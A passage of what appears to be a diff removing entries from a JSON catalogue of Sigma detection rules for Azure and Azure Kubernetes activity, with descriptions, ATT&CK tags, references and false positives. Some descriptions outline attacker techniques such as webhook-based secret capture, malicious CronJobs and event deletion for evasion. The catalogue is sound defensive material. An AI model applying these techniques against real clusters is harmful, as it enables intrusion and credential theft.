- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", - "value": "Granting Of Permissions To An Account", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" - ], - "tags": [ - "attack.t1098" - ], - "creation_date": "2020/05/07", - "filename": "azure_granting_permission_detection.yml", - "author": "sawwinnnaung", - "level": "medium", - "falsepositive": [ - "Valid change" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", - "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", - "value": "User Added To Group With CA Policy Modification Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/04", - "filename": "azure_group_user_addition_ca_modification.yml", - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "level": "medium", - "falsepositive": [ - "User removed from the group is approved" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on group membership removal of groups that have CA policy 
modification access", - "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", - "value": "User Removed From Group With CA Policy Modification Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/04", - "filename": "azure_group_user_removal_ca_modification.yml", - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "level": "medium", - "falsepositive": [ - "User removed from the group is approved" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", - "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", - "value": "Guest User Invited By Non Approved Inviters", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/10", - "filename": "azure_guest_invite_failure.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "medium", - "falsepositive": [ - "A non malicious user is unaware of the proper process" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", - "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", - "value": "User State Changed From Guest To Member", - "meta": { - 
"refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/06/30", - "filename": "azure_guest_to_member.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", - "uuid": "80eeab92-0979-4152-942d-96749e11df40", - "value": "Azure Keyvault Key Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ], - "creation_date": "2021/08/16", - "filename": "azure_keyvault_key_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Key being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a key vault is modified or deleted.", - "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", - "value": "Azure Key Vault Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ], - "creation_date": "2021/08/16", - "filename": "azure_keyvault_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Key Vault being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when secrets are modified or deleted in Azure.", - "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", - "value": "Azure Keyvault Secrets Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ], - "creation_date": "2021/08/16", - "filename": "azure_keyvault_secrets_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", - "value": "Azure Kubernetes Admission Controller", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ], - "creation_date": "2021/11/25", - "filename": "azure_kubernetes_admission_controller.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Azure Kubernetes Admissions Controller may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", - "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", - "value": "Azure Kubernetes Cluster Created or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_cluster_created_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. 
Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", - "value": "Azure Kubernetes CronJob", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ], - "creation_date": "2021/11/22", - "filename": "azure_kubernetes_cronjob.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Azure Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when Events are deleted in Azure Kubernetes. 
An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", - "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", - "value": "Azure Kubernetes Events Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.t1562.001" - ], - "creation_date": "2021/07/24", - "filename": "azure_kubernetes_events_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", - "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", - "value": "Azure Kubernetes Network Policy Change", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_network_policy_change.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies the deletion of Azure Kubernetes Pods.", - "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", - "value": "Azure Kubernetes Pods Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/07/24", - "filename": "azure_kubernetes_pods_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", - "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", - "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", - "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", - "value": "Azure Kubernetes Sensitive Role Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_role_access.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", - "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", - "value": "Azure Kubernetes Secret or Config Object Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_secret_or_config_object_access.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a service account is modified or deleted.", - "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", - "value": "Azure Kubernetes Service Account Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Alert on when legecy authentication has been used on an account", - "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", - "value": "Use of Legacy Authentication Protocols", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2022/06/17", - "filename": "azure_legacy_authentication_protocols.yml", - "author": "Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "User has been put in acception group so they can use legacy authentication" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect failed attempts to sign in to disabled accounts.", - "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", - "value": "Login to Disabled Account", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/10/10", - "filename": "azure_login_to_disabled_account.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", - "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", - "value": "Multifactor Authentication Denied", - "meta": { - "refs": [ - 
"https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ], - "creation_date": "2022/03/24", - "filename": "azure_mfa_denies.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Users actually login but miss-click into the Deny button when MFA prompt." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", - "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", - "value": "Disabled MFA to Bypass Authentication Mechanisms", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1556/", - "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1556" - ], - "creation_date": "2022/02/08", - "filename": "azure_mfa_disabled.yml", - "author": "@ionsor", - "level": "medium", - "falsepositive": [ - "Authorized modification by administrators" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", - "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", - "value": "Multifactor Authentication Interrupted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ], - "creation_date": "2021/10/10", - "filename": "azure_mfa_interrupted.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Firewall Policy is Modified or Deleted.", - "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", - "value": "Azure Network Firewall Policy Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/02", - "filename": "azure_network_firewall_policy_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", - "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", - "value": "Azure Firewall Rule Configuration Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_firewall_rule_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", - "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", - "value": "Azure Point-to-site VPN Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a network security configuration is modified or deleted.", - "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", - "value": "Azure Network Security Configuration Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_security_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Network Security Configuration being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", - "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", - "value": "Azure Virtual Network Device Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_virtual_device_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a new cloudshell is created inside of Azure portal.", - "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", - "value": "Azure New CloudShell Created", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2021/09/21", - "filename": "azure_new_cloudshell_created.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "A new cloudshell may be created by a system administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a owner is was removed from a application or service principal in Azure.", - "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", - "value": "Azure Owner Removed From Application or Service Principal", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/03", - "filename": "azure_owner_removed_from_application_or_service_principal.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Owner being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", - "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", - "value": "PIM Approvals And Deny Elevation", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2022/08/09", - "filename": "azure_pim_activation_approve_deny.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Actual admin using PIM." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when PIM alerts are set to disabled.", - "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", - "value": "PIM Alert Setting Changes To Disabled", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1484" - ], - "creation_date": "2022/08/09", - "filename": 